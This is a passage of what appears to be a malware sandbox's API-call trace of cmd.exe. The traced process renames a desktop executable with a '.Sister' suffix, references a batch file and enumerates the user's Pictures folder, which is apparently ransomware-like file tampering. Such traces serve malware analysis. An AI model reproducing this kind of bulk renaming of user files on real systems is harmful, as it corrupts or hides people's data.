[0292.513] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bf0) returned 0x20 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bf00 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf00, Size=0xb2) returned 0x21ed8c96400 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96400) returned 0xb2 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a450 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a450, Size=0x30) returned 0x21ed937a450 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a450) returned 0x30 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a490 [0292.514] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c961c0 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96580 [0292.514] ??_V@YAXPEAX@Z () returned 0x1 [0292.514] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0292.514] GetProcessHeap () returned 0x21ed8c70000 [0292.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96a00 [0292.515] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed97bfc00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0292.515] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d240, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0292.516] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0292.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d240, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.516] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d240, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cca0 [0292.517] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.517] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d240, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0292.517] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0292.517] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0292.517] GetProcessHeap () returned 0x21ed8c70000 [0292.517] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67230 [0292.518] ??_V@YAXPEAX@Z () returned 0x1 [0292.518] ??_V@YAXPEAX@Z () returned 0x1 [0292.518] GetProcessHeap () returned 0x21ed8c70000 [0292.518] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a490, Size=0x490) returned 0x21ed937a490 [0292.518] GetProcessHeap () returned 0x21ed8c70000 [0292.518] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a490) returned 0x490 [0292.518] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0292.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.518] GetFileType (hFile=0x50) returned 0x2 [0292.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.518] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0292.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.519] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0292.526] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.526] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.526] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0292.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.526] GetFileType (hFile=0x50) returned 0x2 [0292.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.526] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0292.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.527] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0292.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.528] GetFileType (hFile=0x50) returned 0x2 [0292.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.529] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.529] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a460*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed937a460*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0292.530] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0292.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.530] GetFileType (hFile=0x50) returned 0x2 [0292.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.530] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0292.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.531] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0292.536] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0292.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.536] GetFileType (hFile=0x50) returned 0x2 [0292.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.536] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.537] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0292.543] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.544] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.544] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.544] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.544] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.544] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.544] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.544] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.544] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.544] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.544] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.544] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.544] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.544] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.544] ??_V@YAXPEAX@Z () returned 0x1 [0292.544] GetProcessHeap () returned 0x21ed8c70000 [0292.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8c95c40 [0292.545] GetProcessHeap () returned 0x21ed8c70000 [0292.545] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x130) returned 0x21ed8c95c40 [0292.545] GetProcessHeap () returned 0x21ed8c70000 [0292.545] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x130 [0292.545] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.545] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.545] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.545] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.545] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed97bfc00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0292.548] ??_V@YAXPEAX@Z () returned 0x1 [0292.548] GetProcessHeap () returned 0x21ed8c70000 [0292.548] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d621d0 [0292.548] GetProcessHeap () returned 0x21ed8c70000 [0292.548] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e680 [0292.549] GetProcessHeap () returned 0x21ed8c70000 [0292.549] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e680, Size=0x130) returned 0x21ed8d62810 [0292.549] GetProcessHeap () returned 0x21ed8c70000 [0292.549] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62810) returned 0x130 [0292.549] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.549] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.549] GetProcessHeap () returned 0x21ed8c70000 [0292.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb80 [0292.549] GetProcessHeap () returned 0x21ed8c70000 [0292.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d312a0 [0292.549] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.549] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.550] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.550] GetLastError () returned 0x2 [0292.551] GetProcessHeap () returned 0x21ed8c70000 [0292.551] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d45ef0 [0292.551] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d45f00 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.551] SetErrorMode (uMode=0x0) returned 0x0 [0292.551] SetErrorMode (uMode=0x1) returned 0x0 [0292.551] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed97bfc00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0292.551] SetErrorMode (uMode=0x0) returned 0x1 [0292.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0292.551] GetProcessHeap () returned 0x21ed8c70000 [0292.552] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d319f0 [0292.552] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.552] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.552] GetLastError () returned 0x2 [0292.552] ??_V@YAXPEAX@Z () returned 0x1 [0292.552] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.552] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.552] malloc (_Size=0xffce) returned 0x21ed97cfbe0 [0292.552] ??_V@YAXPEAX@Z () returned 0x21ed97cfbe0 [0292.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.552] GetLastError () returned 0x2 [0292.554] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.554] GetFileType (hFile=0x54) returned 0x2 [0292.554] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0292.554] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0292.555] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0292.556] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.556] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.556] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0292.563] longjmp () [0292.563] ??_V@YAXPEAX@Z () returned 0x1 [0292.563] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Camera Roll", cAlternateFileName="")) returned 1 [0292.563] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="CBqE_ptIfCfIXOkQ.gif", cAlternateFileName="")) returned 1 [0292.563] GetProcessHeap () returned 0x21ed8c70000 [0292.563] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7bdf0, Size=0x62) returned 0x21ed8d63f50 [0292.563] GetProcessHeap () returned 0x21ed8c70000 [0292.563] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63f50) returned 0x62 [0292.563] GetProcessHeap () returned 0x21ed8c70000 [0292.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55ee0 [0292.564] GetProcessHeap () returned 0x21ed8c70000 [0292.564] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55ee0, Size=0x30) returned 0x21ed8d55ee0 [0292.564] GetProcessHeap () returned 0x21ed8c70000 [0292.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55ee0) returned 0x30 [0292.564] GetProcessHeap () returned 0x21ed8c70000 [0292.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f20 [0292.564] malloc (_Size=0x1ff9c) returned 0x21ed97dfbc0 [0292.565] GetProcessHeap () returned 0x21ed8c70000 [0292.565] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bf80 [0292.565] ??_V@YAXPEAX@Z () returned 0x1 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f20, Size=0x1c0) returned 0x21ed8d55f20 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f20) returned 0x1c0 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d560f0 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d560f0, Size=0x290) returned 0x21ed8d560f0 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d560f0) returned 0x290 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56390 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56390, Size=0x30) returned 0x21ed8d56390 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56390) returned 0x30 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a930 [0292.566] malloc (_Size=0x1ff9c) returned 0x21ed97dfbc0 [0292.566] GetProcessHeap () returned 0x21ed8c70000 [0292.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7be40 [0292.566] ??_V@YAXPEAX@Z () returned 0x1 [0292.566] malloc (_Size=0x1ff9c) returned 0x21ed97dfbc0 [0292.567] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0292.567] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0292.567] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0292.567] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0292.567] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd8f3eb45, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd8f3eb45, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0292.567] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0292.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x4, dwReserved1=0x7, cFileName="CBqE_ptIfCfIXOkQ.gif", cAlternateFileName="CBQE_P~1.GIF")) returned 0x21ed8c7cd00 [0292.569] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0292.569] _wcsnicmp (_String1="CBQE_P~1.GIF", _String2="CBqE_ptIfCfIXOkQ.gif", _MaxCount=0x14) returned 10 [0292.569] malloc (_Size=0x1ff9c) returned 0x21ed97ffb70 [0292.570] ??_V@YAXPEAX@Z () returned 0x21ed97ffb70 [0292.571] GetProcessHeap () returned 0x21ed8c70000 [0292.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8c50 [0292.571] ??_V@YAXPEAX@Z () returned 0x1 [0292.571] ??_V@YAXPEAX@Z () returned 0x1 [0292.571] GetProcessHeap () returned 0x21ed8c70000 [0292.571] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a930, Size=0x1c0) returned 0x21ed937a930 [0292.571] GetProcessHeap () returned 0x21ed8c70000 [0292.571] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a930) returned 0x1c0 [0292.571] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0292.571] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.571] GetFileType (hFile=0x50) returned 0x2 [0292.572] GetStdHandle 